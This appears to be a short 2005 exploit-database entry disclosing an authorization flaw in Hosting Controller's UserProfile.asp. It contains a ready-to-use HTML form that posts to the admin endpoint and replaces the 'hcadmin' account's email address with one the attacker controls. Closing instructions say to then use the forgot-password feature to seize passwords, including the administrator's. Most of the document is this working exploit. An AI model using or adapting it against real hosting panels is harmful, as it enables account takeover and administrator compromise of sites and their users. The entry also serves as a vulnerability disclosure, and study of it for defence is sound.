File size: 1,195 Bytes
497f2f3 | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 | <!-- Hi, I'm Soroush Dalili from GSG (GrayHatz Security Group). Title: Hosting controller program have a security bug in "UserProfile.asp" that an authenticated user can change other's profiles. Why is it dangerous: a user can change other's email address and then use forgot password to recieve their password! also he/she can gain administrator password by this way! Version: 6.1 HotFix 2.0 and older Developer url: hostingcontroller.com Comment: Hosting Controller is an application to manage a host. Exploit code to proof: -------------------------------- Change users profiles: --> <form action="http://[URL]/admin//accounts/UserProfile.asp?action=updateprofile" method="post"> Username : <input name="UserList" value="hcadmin" type="text" size="50"> <br> emailaddress : <input name="emailaddress" value="Crkchat@msn.com" type="text" size="50"> <br> firstname : <input name="firstname" value="Crkchat" type="text" size="50"> <br> <input name="submit" value="submit" type="submit"> </form> <!-- ----------------------------------- Now u can use forgot password to gain passwords! --> # milw0rm.com [2005-05-27] |